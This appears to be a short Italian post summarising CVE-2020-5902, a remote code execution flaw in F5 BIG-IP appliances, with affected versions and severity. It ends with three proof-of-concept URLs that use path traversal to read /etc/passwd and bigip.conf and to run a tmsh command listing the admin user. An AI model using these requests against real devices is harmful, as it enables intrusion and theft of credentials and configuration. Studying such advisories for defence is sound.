
BIG-IP F5 Esecuzione remota di codice
BIG-IP F5 Esecuzione di codice remoto
Questi attacchi hanno come bersaglio BIG-IP, un dispositivo di rete multiuso prodotto da F5 Networks. I dispositivi BIG-IP possono essere configurati per funzionare come sistemi di traffic shaping, bilanciatori di carico, firewall, gateway di accesso, limitatori di velocità o middleware SSL.
Mercoledì F5 Networks ha pubblicato delle patch e ha rilasciato un advisory di sicurezza riguardante una vulnerabilità di "esecuzione di codice remoto" nei dispositivi BIG-IP.
F5 ha dichiarato che la vulnerabilità, tracciata come CVE-2020-5902, potrebbe consentire agli aggressori di assumere il pieno controllo dei sistemi non patchati accessibili su internet.
Version BIG-IP Vulnerable : 15.0.0-15.1.0.3, 14.*.*, 13.*.*, 12.*.*, 11.*.*
Vulnerability : Remote Code Execution (RCE)
Score CVE : 10/10
https://<BIG-IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://BIG-IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://<BIG-IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin